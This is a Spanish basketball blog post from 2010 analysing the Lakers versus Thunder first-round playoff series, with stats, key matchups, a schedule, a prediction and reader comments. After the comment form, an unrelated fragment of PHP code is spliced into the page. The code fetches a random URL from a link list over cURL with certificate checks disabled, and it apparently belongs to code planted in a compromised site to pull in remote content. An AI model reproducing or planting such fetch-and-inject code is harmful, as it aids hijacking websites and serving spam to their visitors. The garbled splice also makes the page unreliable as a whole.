Análisis Los Angeles Lakers vs Oklahoma City Thunder

16 de April de 2010 por TheDeerHunter

Regular: 3-1 para Lakers

Lakers: P. favor: 101,7 – P. contra 96,9
Thunder:
P. favor: 101,5 – P. contra 97,9

Las dudas arrecian en el corazón del campeón. Lesión de Bynum, banquillo deficiente, Artest incapaz, Kobe ya no es el nº1, Phil Jackson entrenador normalito… Hemos oído de todo, tanto que cualquiera podría pensar que los favoritos son los Thunder. Estaría bien recopilar lo que se llegó a decir de los amarillos el curso pasado desde el primer partido de pretemporada hasta prácticamente aquel triple de Fisher. Los campeones más criticados de la historia.

No cabe duda de que la regular no ha sido brillante, que se debe exigir a un equipo como éste alcanzar como mínimo las 60 victorias. Pero no se puede obviar que son ellos y no otros quienes han podido permitirse muchas derrotas en este final sin renunciar a la primera plaza de esta conferencia tan sumamente dura e igualada. En frente, ni más ni menos que un dignísimo octavo clasificado que no llega a un 10% menos de victorias y con promedios prácticamente idénticos. Cuidado porque el final de temporada tampoco ha sido el deseado en su caso aunque, curiosamente, todos son comentarios optimistas. Todos excepto los que parten del propio entorno del equipo, que seguro no aprecian la empresa de forma tan sencilla.

Claves de la eliminatoria:

–  Cambio a modo PO: Todos sabemos que no es la misma liga, que no es el mismo juego, que no son los mismos árbitros. Se intuye que los Lakers, como equipo experimentado, tienen previsto un cambio de chip en una temporada planificada desde el principio para alcanzar en el mejor estado posible la hora de la verdad. Los Thunder por el contrario carecen de esa experiencia como también de esa planificación. Nadie ha vivido postemporada en ese equipo y no muchos  allí apostaron por playoffs al principio del curso.

–  Minimizar a Westbrook: Partiendo de la asunción que en el duelo Artest sobre Durant frente al Sefolosha sobre Kobe podríamos concluirlo en un teórico empate, los Lakers se han mostrado vulnerables contra buenos bases en general y contra Westbrook en particular. La solución no se antoja completamente evidente aunque ya hemos visto en alguna ocasión a Kobe defender a algún base.

– La vuelta de Bynum: Sin entrar a valorar el enigma Odom, parece complicado que Krstic, Green, Ibaka y compañía puedan igualar un hipotético duelo contra las torres amarillas en buen estado.

Agenda:

–    P1: Domingo 18 a las 21h (hora España) en ABC
–    P2: Martes 20 a las 4:30h
–    P3: Jueves 22 a las 3:30h
–    P4: Sábado 24 a las 3:30h

Pronóstico: 4-1 Lakers

Comenta

7 comentarios a esta entrada

  1. kantonyo dice:
    #1

    Coincido totalmente contigo Deer.

    A veces se nos olvida que la NBA no es igual que la competición en Europa, y que no hay las mismas desigualdades que pasa con el Madrid y el Xacobeo por ejemplo. Los Lakers y los Thunder tienen las mismas posiblidades de contratar a jugadores, quitando algunas excepciones como historia del equipo y prestigio de la ciudad, aunque en contra de Lakers está que solo han podido elegir un jugador (Bynum) entre los 15 primeros del draft desde 1994. Por lo que no entiendo lo de exigir tanto a esta franquicia, con todo lo que ha conseguido.

    Todo son elogios para Dallas, Utah, Denver, Thunder, Suns pero nos olvidamos de que con el freno de mano puesto los Lakers han quedado primeros del oeste con relativa comodidad.

    De ante mano digo que puede ocurrir cualquier cosa, sorpresas hemos visto en cualquier deporte y época, pero en condiciones normales los Lakers deben ganar comodamente a Thunder.

      Citar

  2. Love Denise dice:
    #2

    Nadie ha dicho que los Thunders vayan a eliminar a los Lakers, de hecho, me parece que nadie lo ha puesto eliminado en 1era ronda en la porra

      Citar

  3. Txusma dice:
    #3

    De hecho, si Thunders elimina a los Lakers entrarían en la historia a la altura de los Warriors de Baron Davis y su “We Believe!”

      Citar

  4. TheDeerHunter dice:
    #4

    Yo tampoco he insinuado que se haya dicho, LoveD…
    pero el run run al que me refiero está ahí

      Citar

  5. pcerezo dice:
    #5

    Está claro que la serie depende de Lakers y no de Thunder.
    Al 60-70% los Lakers deben ganar fácil, lo que sí está claro es que para OKC es el primer paso hacia algo que puede ser grande…

    En cuanto a lo de exigencias a Lakers, me imagino que serán grandes, ya que la pasta que están pagando en impuesto de lujo es tremenda y los esfuerzos por Odom, Artest, Bynum y el contrato de Gasol son para llegar a finales mínimo.

    Un saludo,
    Pablo

      Citar

  6. kantonyo dice:
    #6

    Pagan bastante de impuesto de lujo, pero claramente se compensa con los derechos de imagen de la franquicia con los exitos hasta ahora.

    Oklahoma en este momento paga segun hoopshype: 58M$ y Lakers: 91M$, pero es por una única razón, los Thunder han elegido en el draft a Durant (4,7M$), Harden (4M$), Westbrook(3,7M$), Green (3,5M$), Ibaka (1,1M$), casi todos en los primeros puestos, por lo tanto tambien habría que exigirles rendimiento. Si estos jugadores siguen con su progresión, cuando sus contratos terminen tambíen habrá que llegar a esos 91M$ para mantenerlos, pero no te garantiza los éxitos que ha tenido Lakers estos años.

    Si por ejemplo elegimos un equipo como el Betis, y le colocamos cada año a dos de los 5 mejores promesas del mundo, habría que exigirles en 3-4 años resultados. En cambio a Lakers no le podemos comparar con el Real Madrid de Florentino, ya que quitando a Pau Gasol que fue un regalo (aunque al final Grizzlies ha crecido gracia a ese traspaso), los demás han sido sin ejercer economicamente su poder: Bryant por Divac, Odom por Oneal, Artest por Ariza, Brown por Radmanovic, Farmar (26º), Vujacic (27º).

      Citar

  7. Love Denise dice:
    #7

    Phil jackson multado por decir: “Por la cantidad de faltas que le pitan a favor de Durant, no me queda la menor duda que los árbitros los están tratando como una súper estrella”.
    O sea, entonces a tu querido Bryant también le pitan muchas faltas a favor que no son, simplemente por ser una estrella, no?
    No será que tito Phil tiene el famoso canguelo y ya está presionando a los arbitros de cara a los Playoffs?
    ya me estoy imaginando a Artest dandole cera por todas partes a Durant y los arbitros mirando a otro lado.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>